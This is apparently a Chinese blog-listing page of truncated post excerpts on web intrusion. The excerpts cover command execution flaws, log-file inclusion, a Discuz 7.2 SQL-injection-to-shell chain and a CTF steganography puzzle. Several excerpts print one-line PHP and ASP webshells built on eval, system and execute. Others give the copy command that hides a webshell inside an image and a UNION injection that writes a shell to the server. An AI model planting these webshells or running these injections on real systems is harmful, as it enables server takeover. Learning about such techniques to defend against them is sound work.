0x01:命令执行漏洞简介用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码0x02:命令执行VS代码执行命令执行漏洞:直接调用操作系..
分类:
其他好文 时间:
2016-12-20 21:18:58
阅读次数:
2861
创建一个shell.php的一句话木马,通过window下copy命令copy123.png+shell.php123.png重新生成一个123.png的图片。上传到服务服务器上,直接拿菜刀连。
分类:
其他好文 时间:
2016-12-08 00:00:24
阅读次数:
648
包含日志文件getshell 一、包含日志文件漏洞利用概述 当我们没有上传点,并且也没有url_allow_include功能时,我们就可以考虑包含服务器的日志文件。 利用思路也比较简单,当我们访问网站时,服务器的日志中都会记录我们的行为,当我们访问链接中包含PHP一句话木马时,也会被记录到日志中。 ...
分类:
系统相关 时间:
2016-09-09 00:48:49
阅读次数:
707
思路:上传一个“后门”,通过控制后门来得到shell,比如一句话木马。比如:<?system($_REQUEST[‘cmd‘]);?>//通过request提交,执行shell<?php@eval($_POST[‘chopper‘]);?>//PHP一句话木马,直接上菜刀这里构造如下语句:1‘and1=2unionselect"<?",system($_REQU..
分类:
数据库 时间:
2016-09-04 17:54:20
阅读次数:
364
1.将图片和一句话木马放在同一个文件夹 2.创建快捷方式,将起始位置修改为图片和txt文本的路径。 3.进行合成,命令如下 copy 1.png /b + 1.txt /a 2.png 4.成功!自行测试。本人亲测可用。 1.将图片和一句话木马放在同一个文件夹 2.创建快捷方式,将起始位置修改为图片 ...
分类:
其他好文 时间:
2016-08-30 22:45:33
阅读次数:
826
Notepad++查看,发现图片PS痕迹。其实是废话 属性查看为空 stegsolve一无所获 PICASA查看属性一无所获 16进制查看发现在结束标识符后还有数据: <%execute request("images")%> 这太扯了这不就是一句话木马吗 KEY提示说SHA1 。尝试加密。居然过了 ...
分类:
其他好文 时间:
2016-07-31 11:30:45
阅读次数:
162
Discuz!7.2版本,这个版本是09年的平台了,现在已经是X版本了,不过里面的一些知识倒是到现在也还适用。 简述:利用Discuz!7.2的SQL注入漏洞爆出管理员用户密码后再利用xml检测漏洞上传一句话木马+菜刀getshell获得服务器控制权 实现过程: 首先,找到Discuz!版本为7.2 ...
分类:
Web程序 时间:
2016-06-18 21:14:42
阅读次数:
2448
手工注入 说下我的基本思路:1、目标站点环境为:Windows+Apache+Mysql+PHP2、存在SQL注入,能否直接写一句话木马3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马不想因 ...
分类:
其他好文 时间:
2016-05-09 21:57:03
阅读次数:
294
eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马 就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范 <?php @eval($_POST['c']);?> 使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 <h
分类:
Web程序 时间:
2016-02-03 10:39:32
阅读次数:
137
在互联网发达的今天,各种水平的程序用应时而生,不注重安全,导致很多网站都被挂马,这样的一句话后门是黑客最喜欢的,隐藏性好,这里将代码分享给大家,大家可以通过查找工具查找替换 %>""then session("c")=request("c"):end if:if session("c")"" ...
分类:
其他好文 时间:
2015-07-10 13:25:31
阅读次数:
190